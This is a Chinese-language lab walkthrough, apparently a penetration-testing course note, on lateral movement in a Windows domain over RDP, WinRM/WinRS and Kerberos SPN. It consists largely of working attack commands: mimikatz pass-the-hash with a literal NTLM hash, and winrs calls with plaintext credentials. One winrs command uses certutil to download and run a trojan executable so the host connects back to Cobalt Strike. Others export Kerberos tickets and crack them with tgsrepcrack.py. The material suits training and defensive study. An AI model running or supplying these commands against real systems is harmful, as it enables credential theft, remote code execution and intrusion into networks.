第131天:内网安全-横向移动Kerberos 攻击SPN扫描WinRMWinRSRDP
案例一:域横向移动-RDP-明文&NTLM
RDP利用的三种方式
1.直接在当前被控主机上进行远程连接
2.建立节点进行连接
3.端口转发,(访问当前主机的2222端口等于访问目标的3389)
第一种方式(动静太大)
直接利用被控主机进行远程连接
点击这个图标可以控制
输入win+r输入mstsc,输入想访问的ip
但是好像需要域管理员设置策略以后才允许普通用户之间连接
用管理员用户去登录域控主机
第二种方式
设置socks代理
通过代理利用rdesktop命令远程连接目标主机
登录管理员用户
在主机中查看会发现,有两个用户登录了这台主机
也可以利用hash进行登录,但是环境配置以及利用比较复杂,不做复现,可以用下面这篇文章学习
内网技巧-RDP劫持及利用hash登录 - 先知社区
privilege::debug
sekurlsa::pth /user:administrator /domain:192.168.20.1 /ntlm:579da618cfbfa85247acf1f800a280a4 "/run:mstsc.exe /restrictedadmin"
案例二:域横向移动-WinRM&WinRS-明文&NTLM
WinRM:
- 功能:WinRM是一种用于远程管理和配置Windows系统的协议和服务。它提供了基于SOAP(Simple Object Access Protocol)协议的远程管理功能
WinRS:
- 功能:WinRS是一种轻量级的命令行远程管理工具,允许在远程计算机上执行命令行命令,类似于在本地计算机上使用命令提示符。
利用条件:
双方都启用的 Winrm rs 的服务
在Windows Server 2012及之后的版本中,WinRM服务默认是开启的。但在Windows Server 2008 R2及之前的版本,以及Windows 7等桌面操作系统中,可能需要手动开启WinRM服务。
winrm的默认端口时http为5985端口https为5986端口,扫描5985
发现只能扫描到win2012
攻击主机的开启方式,这里对外开放的那张网卡不能设置为公用
启动命令必须为高权限的system所以需要提权
winrm quickconfig -q
winrm set winrm/config/Client @{TrustedHosts="*"}
再次查看端口已经开放
创建服务以后利用工具winrs进行连接
winrs -r:192.168.3.30 -u:192.168.3.30\administrator -p:123.com whoami这个命令貌似只能在cmd窗口当中去执行,在cs中执行会显示句柄无效
cs中
我想了个办法让他在cs当中也能够运行,把前面的语句输出通过管道符给cmd,让cmd去执行就ok
shell echo winrs -r:192.168.3.30 -u:192.168.3.30\administrator -p:123.com whoami | cmd
cmd中
上线cs,和之前一样访问web服务器下载木马并运行,记得设置代理转发。
winrs -r:192.168.3.30 -u:192.168.3.30\administrator -p:123.com "cmd.exe /c certutil -urlcache -split -f http://192.168.3.20/2.exe c:/2.exe & c:/2.exe"
cs当中内置了winrm横向移动
案例三:域横向移动-Spn&Kerberos-请求&破解&重写
该案例适用不知道加密密码和hash,且加密方式为rc4的
spn,服务主体名称,spn扫描不仅仅扫描的是端口,而且连同服务名称一起扫描,只能扫描windows自带的一些服务
加密类型必须为rc4,组策略中设置kerberos的加密类型
spn扫描
setspn -T qq.com -q */* #扫描全部服务
setspn -T qq.com -q */* | findstr "MSSQL" #扫描指定服务
请求服务
powershell请求
powershell Add-Type -AssemblyName System.IdentityModel
powershell New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/Srv-DB-0day.0day.org:1433"mimakatz请求
mimikatz kerberos::ask /target:MSSQLSvc/Srv-DB-0day.0day.org:1433
我采用mimikatz请求服务,请求之前先清除所有票据
完事查看票据,如果刚才请求服务的那条票据是rc4加密的证明是可以利用的
导出票据
mimikatz kerberos::list /export
然后下载到本地,利用票据破解程序破解密码
GitCode - 全球开发者的开源社区,开源代码托管平台
python3 tgsrepcrack.py pass.txt "0-40e00000-webserver$@krbtgt~GOD.ORG-GOD.ORG.kirbi"
这里能不能破解出密码,取决与密码字典是否包含
这里我是变了一套环境,因为之前自己搭的环境无法复现,不过大致思路都一样